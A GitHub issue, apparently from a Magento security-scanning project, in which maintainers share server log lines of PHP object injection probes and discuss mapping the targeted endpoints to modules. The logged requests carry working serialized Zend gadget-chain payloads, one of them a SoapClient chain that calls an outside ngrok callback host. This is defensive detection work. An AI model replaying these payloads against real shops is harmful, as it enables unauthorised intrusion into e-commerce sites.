Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

More POI probes #20

Open
gwillem opened this issue Feb 21, 2019 · 3 comments
Open

More POI probes #20

gwillem opened this issue Feb 21, 2019 · 3 comments

Comments

@gwillem
Copy link
Collaborator

gwillem commented Feb 21, 2019

185.198.56.4 - [05/Jan/2019:16:44:21 +0000] "GET /customerconnect/rfqs/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" ""
185.198.56.4 - [06/Jan/2019:17:16:07 +0000] "GET /vendors/credit/withdraw/review/?data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" ""
109.237.138.20 - [06/Jan/2019:18:23:37 +0000] "GET /comm/returns/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" ""

@mpchadwick
Copy link
Collaborator

In cases where the endpoint cannot be correlated back to a specific module what if we extracted the frontName from the relevant URI column and checked for modules that registered the same <frontName>. It's going to be more noisy than using full module identifier + version, but people can manually review the code if it's flagged (and maybe it can help with correlating the endpoints back to specific modules).

@rhoerr
Copy link
Collaborator

rhoerr commented Feb 21, 2019

I brought that up in #11 (comment). I like the idea but we'll have to normalize the route data for it to work. That might be a feature for the MageRun plugin only; it would drastically increase the size of the single-line command.

@gwillem
Copy link
Collaborator Author

gwillem commented Feb 28, 2019

2018-08-21T02:42:41+00:00 301    178 UA 193.106.30.131  "GET GET /ajax/Showroom/submit/?schedule[time]=O%3A8%3A%22Zend_L
og%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00_writers%22%3Ba%3A1%3A%7Bi%3A1%3BO%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%2
2%3Bs%3A47%3A%22http%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A8%3A%22location%22%3Bs%3A47%3A%22ht
tp%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D%7D%7D HTTP/1.1
" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants